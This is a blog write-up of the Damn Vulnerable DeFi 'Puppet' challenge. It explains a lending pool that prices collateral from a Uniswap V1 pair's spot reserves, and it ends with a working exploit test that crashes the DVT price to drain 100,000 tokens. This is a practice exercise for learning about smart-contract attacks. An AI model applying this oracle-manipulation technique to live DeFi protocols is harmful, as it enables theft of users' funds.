moon

moon

Build for builders on blockchain
github
twitter

Defi Hacker Series: Damn Vulnerable DeFi (8) - Puppet

Damn Vulnerable DeFi is a series of challenges focused on DeFi smart contract attacks. The content includes flash loan attacks, lending pools, on-chain oracles, and more. Before you start, you need to have skills related to Solidity and JavaScript. For each challenge, all you need to do is ensure that the unit tests for that challenge pass.

Challenge link: https://www.damnvulnerabledefi.xyz/challenges/8.html

Challenge description:

There is a lending pool that provides lending services for DVT tokens, but you need to deposit twice the value in ETH as collateral first. Currently, there are 100,000 DVT in this pool.

UniswapV1 now has a trading pair ETH-DVT, with 10 ETH and 10 DVT.

You currently have 25 ETH and 1000 DVT. You need to steal all the tokens from the lending pool.

The lending contract PuppetPool.sol provides the following lending functionality:

// Borrow DVT, but you must deposit twice the value in ETH
function borrow(uint256 borrowAmount) public payable nonReentrant {
    // Calculate the amount of ETH required to deposit
    uint256 depositRequired = calculateDepositRequired(borrowAmount);
    require(msg.value >= depositRequired, "Not depositing enough collateral");

    // Refund excess ETH
    if (msg.value > depositRequired) {
        payable(msg.sender).sendValue(msg.value - depositRequired);
    }

    // Save the amount of ETH deposited by msg.sender
    deposits[msg.sender] = deposits[msg.sender] + depositRequired;

    // Transfer DVT token to msg.sender
    require(token.transfer(msg.sender, borrowAmount), "Transfer failed");

    emit Borrowed(msg.sender, depositRequired, borrowAmount);
}

This method mainly does the following:

  • Calculates the amount of ETH that needs to be deposited based on the amount of DVT borrowed, called depositRequired.
  • Ensures that the amount of ETH deposited during the call is greater than depositRequired; if more is deposited, the difference is refunded.
  • Saves the amount of ETH deposited and lends out DVT.

The calculation of the required ETH deposit is based on the liquidity of the pair contract ETH-DVT in uniswapv1. Here is a brief introduction to the contracts and their methods in uniswapv1.

There are two types of contracts:

  • Factory contract, used to create and deploy pair contracts. The core method is createExchange(token: address): address, which creates and deploys the pair contract for ETH against token, returning the address of the pair contract.

  • Exchange trading contract, also known as the pair contract. In version v1, there are only trading pairs for ETH against Token, and no trading pairs for Token against Token.

Once a pair contract is created through the factory contract, the method addLiquidity can be called to add liquidity, which means depositing Token and ETH into the pair contract, while liquidity providers receive LP tokens as proof of providing liquidity.

@payable
addLiquidity(
    min_liquidity: uint256,
    max_tokens: uint256,
    deadline: uint256
): uint256

When calling this method, in addition to the parameters, ETH must also be sent. The parameters are explained as follows:

  • min_liquidity is the minimum number of LP tokens that the liquidity provider expects to receive; if the final amount is less than this value, the transaction will revert.
  • max_tokens is the maximum number of tokens that the liquidity provider wants to provide; if the calculated token amount exceeds this value and they do not want to provide it, the transaction will revert.
  • deadline is the deadline for providing liquidity.

When there is liquidity in the pair contract, other traders can trade. Unlike centralized exchanges, the trading price is determined by the latest transaction price on the order book. The trading price in uniswap is calculated based on the constant product formula:

ConstantProductFormula:k=x×yConstant Product Formula: k = x \times y

where xx and yy are the reserve amounts of the two paired currencies.

Assuming there is a pair contract ETH-USDT, where ETH has 10 as xx and USDT has 100 as yy. Then k=10×100=1000k = 10 \times 100 = 1000.

At this point, to sell Δx\Delta x amount of ETH, the amount of USDT received is Δy\Delta y. This means the amount of ETH in the pool becomes x+Δxx + \Delta x. According to the constant product formula:

x×y=(x+Δx)(yΔy)yΔy=x×yx+ΔxΔy=yx×yx+ΔxΔy=y×(x+Δx)x+Δxx×yx+ΔxΔy=x×y+y×Δxx×yx+ΔxΔy=y×Δxx+Δx\begin{align*} & x \times y = (x + \Delta x)(y - \Delta y) \\ & y - \Delta y = \frac {x \times y}{x + \Delta x} \\ & \Delta y = y - \frac {x \times y}{x + \Delta x} \\ & \Delta y = \frac {y \times (x + \Delta x)}{x + \Delta x} - \frac {x \times y}{x + \Delta x} \\ & \Delta y = \frac {x \times y + y \times \Delta x - x \times y}{x + \Delta x} \\ & \Delta y = \frac {y \times \Delta x}{x + \Delta x} \end{align*}

Similarly, selling Δy\Delta y amount of USDT will yield ETH amount of Δx=x×ΔyyΔy\Delta x = \frac {x \times \Delta y}{y - \Delta y}.

This is the calculation formula without transaction fees, but typically a fee of 0.3% is charged and distributed according to the proportion of LP tokens held by liquidity providers.

In the presence of transaction fees, to sell Δx\Delta x amount of ETH, the actual amount of ETH sold is Δx×(10.3%)=Δx×0.997\Delta x \times (1 - 0.3\%) = \Delta x \times 0.997. For convenience, uniswap multiplies both the numerator and denominator by 1000.

Δy=y×Δxx+ΔxΔy=y×(Δx×0.997)x+(Δx×0.997)Δy=y×(Δx×0.997)×1000x×1000+(Δx×0.997)×1000Δy=y×Δx×997x×1000+Δx×997\begin{align*} & \Delta y = \frac {y \times \Delta x}{x + \Delta x} \\ & \Delta y = \frac {y \times (\Delta x \times 0.997)}{x + (\Delta x \times 0.997)} \\ & \Delta y = \frac {y \times (\Delta x \times 0.997) \times 1000}{x \times 1000 + (\Delta x \times 0.997) \times 1000} \\ & \Delta y = \frac {y \times \Delta x \times 997}{x \times 1000 + \Delta x \times 997} \end{align*}

In version v1 of uniswap, several methods are provided to query prices:

  • getEthToTokenInputPrice(eth_sold: uint256): uint256 inputs the amount of ETH sold and returns the amount of token received.
  • getTokenToEthOutputPrice(eth_bought: uint256): uint256 inputs the amount of ETH to buy and returns the amount of token needed.
  • getEthToTokenOutputPrice(tokens_bought: uint256): uint256 inputs the amount of token to buy and returns the amount of ETH needed.
  • getTokenToEthInputPrice(tokens_sold: uint256): uint256 inputs the amount of token sold and returns the amount of ETH received.

The exchange-related methods are as follows:

  • ethToTokenSwapInput(min_tokens: uint256, deadline: uint256): uint256 exchanges ETH for token: min_tokens is the minimum number of token expected. If the amount of ETH sent is insufficient to exchange for the expected number of token, the transaction fails. If sufficient, the full amount is exchanged and the transaction is executed. The function returns the number of token that can be exchanged.
  • ethToTokenSwapOutput(tokens_bought: uint256, deadline: uint256): uint256 exchanges ETH for token: when calling this method, ETH is sent to exchange for tokens_bought amount of token. If the amount of ETH sent is too much, the excess will be refunded. The function returns the actual amount of ETH sold.
  • tokenToEthSwapInput(tokens_sold: uint256, min_eth: uint256, deadline: uint256): uint256 exchanges token for ETH.
  • tokenToEthSwapOutput(eth_bought: uint256, max_tokens: uint256, deadline: uint256): uint256 exchanges token for ETH.

Returning to the challenge, the method calculateDepositRequired in the lending contract PuppetPool.sol calculates the required amount of ETH to deposit:

// Calculate the amount of ETH that needs to be deposited
function calculateDepositRequired(uint256 amount) public view returns (uint256) {
    // The value of the collateral = amount borrowed * price * 2
    return amount * _computeOraclePrice() * 2 / 10 ** 18;
}

// Calculate the value of each token in terms of ETH
function _computeOraclePrice() private view returns (uint256) {
    // calculates the price of the token in wei according to Uniswap pair
    return uniswapPair.balance * (10 ** 18) / token.balanceOf(uniswapPair);
}

From the code, it can be seen that the value of token comes from the reserve amounts of the two currencies in the uniswap pair.

Assuming there is a pair contract ETH-UNI, where there are 100 ETH and 10 UNI, then the value of 1 UNI is equivalent to 10 ETH, meaning the value of each token is equal to ETH reserveToken reserve\frac {ETH \text{ reserve}}{Token \text{ reserve}}. If the value of the denominator can be increased or the value of the numerator can be decreased, the value of each token will decrease.

Given that the hacker holds 25 ETH and 1000 DVT, they can use the 1000 DVT they hold to exchange for ETH, which will greatly increase the value of the denominator and decrease the value of the numerator. This means the value of DVT will become very low.

Then, when borrowing, the required collateral in ETH will only need to be a small amount. Finally, they can exchange back for DVT from uniswap.

it('Exploit', async function () {
  const attackerCallLendingPool = this.lendingPool.connect(attacker)
  const attackerCallToken = this.token.connect(attacker)
  const attackerCallUniswap = this.uniswapExchange.connect(attacker)

  // Authorize uniswap to manage the attacker's DVT token
  await attackerCallToken.approve(attackerCallUniswap.address, ATTACKER_INITIAL_TOKEN_BALANCE)
  
  // Initial balances
  // attacker: ETH balance => 25
  // attacker: DVT balance => 1000
  // uniswap: ETH balance => 10
  // uniswap: DVT balance => 10
  
  // Use DVT to exchange for ETH on uniswap
  await attackerCallUniswap.tokenToEthSwapInput(
    ATTACKER_INITIAL_TOKEN_BALANCE,
    ethers.utils.parseEther('1'),
    (await ethers.provider.getBlock('latest')).timestamp * 2
  )
  // attacker: ETH balance => 34.900571637914797588
  // attacker: DVT balance => 0
  // uniswap: ETH balance => 0.099304865938430984
  // uniswap: DVT balance => 1010

  // Calculate the amount of ETH needed as collateral
  const collateralCount = await attackerCallLendingPool.calculateDepositRequired(POOL_INITIAL_TOKEN_BALANCE)
  // Borrow DVT
  await attackerCallLendingPool.borrow(POOL_INITIAL_TOKEN_BALANCE, {
    value: collateralCount
  })
  // collateralCount = 19.6643298887982
  // attacker: ETH balance => 15.236140794921379778
  // attacker: DVT balance => 100000.0
  // uniswap: ETH balance => 0.099304865938430984
  // uniswap: DVT balance => 1010.0

  // Calculate how much ETH is needed to exchange for ATTACKER_INITIAL_TOKEN_BALANCE amount of DVT
  const payEthCount = await attackerCallUniswap.getEthToTokenOutputPrice(ATTACKER_INITIAL_TOKEN_BALANCE, {
    gasLimit: 1e6
  })
  // payEthCount = 9.960367696933900101
  
  // Exchange for DVT
  await attackerCallUniswap.ethToTokenSwapOutput(
    ATTACKER_INITIAL_TOKEN_BALANCE,
    (await ethers.provider.getBlock('latest')).timestamp * 2,
    {
      value: payEthCount,
      gasLimit: 1e6
    }
  )
  // attacker: ETH balance => 5.275716174066780228
  // attacker: DVT balance => 101000.0
  // uniswap: ETH balance => 10.059672562872331085
  // uniswap: DVT balance => 10.0
})

The attacker manipulated the price using uniswap, successfully borrowing 100,000 DVT with 19.6643298887982 ETH as collateral, while directly borrowing would have cost 200,000 ETH.

Finally, executing yarn puppet passes the test!

Full code

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.